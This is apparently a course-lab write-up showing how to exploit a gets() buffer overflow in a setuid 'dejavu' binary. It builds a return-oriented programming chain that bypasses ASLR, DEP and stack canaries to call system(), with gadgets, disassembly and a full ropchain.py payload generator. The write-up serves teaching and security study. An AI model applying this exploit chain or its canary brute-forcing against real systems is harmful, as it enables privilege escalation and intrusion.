ropchain

I’m going to show you how to do Project 1 Question 1 while ASLR+DEP+stack canaries are enabled. As a reminder, here’s how the code looks:

void deja_vu() {
    char door[8];
    gets(door);
}

int main() {
    deja_vu();
}

A Chinese translation of this article is available here.

ASLR and DEP

We will start by defeating ASLR and DEP. The text segment of our dejavu binary will not be randomized, since it is not a position-independent executable. This means we can get around both defenses with a return oriented programming chain. Our solution is broken up into many different steps:

  1. Put the address of the system function from libc onto the stack.
  2. Put the address of the string "s/kernel/rtsig-max" onto the stack (but possibly far from system).
  3. Align the stack pointer to point to "s/kernel/rtsig-max".
  4. Align edx to point to &system.
  5. Call [edx].

This is equivalent to system("s/kernel/rtsig-max"), which executes an attacker-controlled binary with setuid privileges. The string "s/kernel/rtsig-max" is mostly arbitrary, any string contained in libc which can be treated as a relative Linux path and ends whose address ends in a NUL byte is a valid target.

It’s possible to get the string "/bin/sh" on the stack instead, but that makes our attack more complicated.

Return Oriented Programming Primer

The idea behind return oriented programming is that you place the addresses of “gadgets” onto the stack. These gadgets do some (usually small) operation, and then call ret. Once we ret, that pops the address of the next gadget off the stack and jumps to that address. Our goal is to chain these small gadgets together in order to achieve arbitrary code execution.

Effectively, we can think of ROP as letting us jump to any series of addresses we want, as long as the calls doesn’t mess up our stack. Usual suspects for messing up the stack is a leave or anything which changes esp by a lot.

There are tools to help find gadgets within executables. This is useful, because sometimes gadgets can even be hidden inside other instructions! Let’s run ROPgadget to see what sort of gadgets we have.

    $ python ROPgadget.py --binary ../dejavu --badbytes 0a
    # ...
    Unique gadgets found: 86

We set a “bad byte” of 0x0a since we know that our gets function cannot write a newline. (It can write NUL bytes.) While we have a bunch of gadgets, most of them suck. Here are the few that we plan to use:

    0x0804841c : dec ecx ; ret
    0x0804835e : add dh, bl ; ret
    0x0804857b : call dword ptr [edx]
    0x080482d2 : pop ebx ; ret
    0x080482bb : ret

Note that the last of these gadgets is effectively a return oriented programming NOP: it just moves the esp up 4 bytes to access the next return address. We’ll see later why it is useful.

The Attack

We will need to reference the disassembly quite often. Here is the disassembly of the dejavu program, excluding libc parts.

    deja_vu:
       0x0804840c <+0>:         push   ebp
       0x0804840d <+1>:         mov    ebp,esp
       0x0804840f <+3>:         sub    esp,0x28
       0x08048412 <+6>:         lea    eax,[ebp-0x10]
       0x08048415 <+9>:         mov    DWORD PTR [esp],eax
       0x08048418 <+12>:        call   0x80482f0 <gets@plt>
       0x0804841d <+17>:        leave  
       0x0804841e <+18>:        ret   
    main:
       0x0804841f <+0>:         push   ebp
       0x08048420 <+1>:         mov    ebp,esp
       0x08048422 <+3>:         and    esp,0xfffffff0
       0x08048425 <+6>:         call   0x804840c <deja_vu>
       0x0804842a <+11>:        mov    eax,0x0
       0x0804842f <+16>:        leave  
       0x08048430 <+17>:        ret    

Let’s take a look at the stack layout at deja_vu+18 (right before we ret from the function). It looks something like this:

    /---------------------\
    |        . . .        |
    |  saved return addr. |  <--- esp
    |        . . .        |
    |        door         |  <--- eax, edx
    |        . . .        |
    |        . . .        |
    |        . . .        |
    |      libc_end       |  <--- ecx
    |        . . .        |
    |       system        |  <--- we want this
    |        . . .        |
    |     libc_start      |  <--- ebx
    |        . . .        |
    |        . . .        |
    |        . . .        |
    |    dejavu .text     |
    \---------------------/

Even though libc’s position in code is randomized, ebx and ecx effectively “leak” information about its location. This is a result of the dynamic loader resolving the call to gets@plt. How this occurs is a little complicated, so let’s take it for granted.

While the address of libc is randomized by ASLR, the offset of things within libc is not. For example, the system function is always at 0x168494 bytes before libc_end. We want to call this function, so we need to decrease ecx by 0x168494.

How can we decrease ecx? We do have a promising gadget which decrements ecx by 1:

    0x0804841c : dec ecx ; ret

We would need to call this gadget 0x168494 times to get the address of system. (There are no other useful gadgets for either ecx or ebx.) Our available stack space is an order of magnitude less.

However, we can use the following trick: we return to main. Because gcc aligns the stack at 16 bytes intervals, we will gain stack space every time we call main. The picture below illustrates the scenario right before main+3 executes:

    /---------------------\
    |        . . .        |
    |       4 bytes       |  <--- old esp
    |         sfp         |  <--- esp, ebp
    |       4 bytes       |
    |       4 bytes       |
    |       4 bytes       |  <--- esp & 0xfffffff0
    |        . . .        |
    \---------------------/

After we call main, our program continues to call deja_vu. This gives us another opportunity to do a buffer overflow to gain more stack space. By repeating this method a bunch of times, we can get enough stack space to do 0x168494 decrements. We need to perform all the decrements at once since our value for ecx gets overwritten every time gets is called.

We perform the same method in order to get the address of "s/kernel/rtsig-max" onto the stack.

Once we have ecx pointing to system, we now need to call the address. There is a call gadget call dword ptr [edx]. So we need some way to get the address of the value of ecx into edx. The only place where we have the opportunity to put ecx on the stack is a push ecx in _start. The _start function is called by the operating system before main and effectively loads libc which then begins the main program.

    _start:
       0x08048320 <+0>:     xor    ebp,ebp
       0x08048322 <+2>:     pop    esi
       0x08048323 <+3>:     mov    ecx,esp
       0x08048325 <+5>:     and    esp,0xfffffff0
       0x08048328 <+8>:     push   eax
       0x08048329 <+9>:     push   esp
       0x0804832a <+10>:    push   edx
       0x0804832b <+11>:    push   0x80484b0
       0x08048330 <+16>:    push   0x8048440
       0x08048335 <+21>:    push   ecx
       0x08048336 <+22>:    push   esi
       0x08048337 <+23>:    push   0x804841f
       0x0804833c <+28>:    call   0x8048310 <__libc_start_main@plt>
       0x08048341 <+33>:    hlt    

In order to have the program run correctly and to push ecx on the stack, we need to jump to _start+9. We could actually jump to anywhere between _start+5 and _start+11, but this will mess up our stack alignment later on.

Recall that the return value of gets is stored in edx. We can use some arithmetic in order to get that edx to point one of the system calls. We do have a gadget which involves arithmetic using edx and ebx:

    0x0804835e : add dh, bl ; ret

If you need a reminder of how x86 registers work, look at the following diagram.

    /------------------------\
    |          edx           |
    |           |     dx     |
    |           |  dh  |  dl |
    \------------------------/

The register edx refers to the whole 32-bit register. The register dx refers to the lower 16-bits of the register. dh and dl refer to the two 8-bit halves of the lower 16-bits. So this gadget lets us change the middle bits of edx however we want. Note we can’t “overflow” dh into the top half of the register, so we cannot actually affect the top bits of edx.

There is also a gadget letting us pop into ebx, so we completely control bl. We can load any value we want into ebx by putting it on the stack and then letting it get popped into the register. However this only lets us affect the second least significant byte of edx. Since edx is also the address of the door buffer, we can also change door and also edx by changing our stack pointer. Therefore we can use the same stack trick of returning to main in order to align edx with the address of system.

Now we need to align our stack pointer with our executable string so that we can use it as an argument to system. We simply use a ROP NOP (similar to a ret2ret chain):

    0x080482bb : ret

After a few NOPs, we have that our stack pointer is nearly at the right spot. We finish our ROP chain with the previously mentioned call dword ptr [edx]. gets also terminates this with a NUL byte, which overwrites the LSB of the executable string address. (This is why we chose a string whose LSB was already 0x00.)

Now we are in a ret2libc scenario: we are calling system with a pointer to a string on the stack. This runs the program as uid brown, which allows us to do whatever we want.

Stack Canaries

Let’s say that we also add stack canaries. How much more difficult does this make our exploit?

Debian systems always set the least significant byte of the canary to 0x00, and so we only have 24 bits of entropy. We stay with the constant guess of 0x41414100 as the stack canary, and simply keep running until we get that. An efficient C program using syscalls can get on the order of 2500 tries per second. Based on this, we can estimate that our program will take approximately 1.2 hours to crack the canary.

Closing Thoughts

The final ropchain is listed in ropchain.py below. The code can be modified to create the necessary directories and executable automatically, and to work when stack canaries are enabled.

#!/usr/bin/env python2
# ropchain.py
from struct import pack

p = lambda n: pack("<I", n)
sc = []

PAD = 'A' * 20
DEC_ECX = p(0x0804841c)
RET_MAIN = p(0x0804841f)
RET_START = p(0x08048320 + 9)
POP_EBX = p(0x080482d2)
ADD_DH_BL = p(0x0804835e)
CALL_STAR_EDX = p(0x0804857b)
ROP_NOP = p(0x080482bb)
NEWLINE = '\n'

GET_16B = PAD + RET_MAIN + NEWLINE

OFFSET_BINARY = 0x450c4
OFFSET_SYSTEM = 0x168494

def load_libc_address(offset):
    sc.extend([GET_16B] * ((offset + 3) / 4))
    
    sc.append(PAD)
    sc.extend([DEC_ECX] * offset)
    sc.append(RET_START)
    sc.append(NEWLINE)

load_libc_address(OFFSET_SYSTEM) 
load_libc_address(OFFSET_BINARY) 

sc.extend([GET_16B] * 3)

sc.append(PAD + POP_EBX + p(1))
sc.append(ADD_DH_BL)
sc.extend([ROP_NOP] * 15)    
sc.append(CALL_STAR_EDX)
sc.append(NEWLINE)

print(''.join(sc))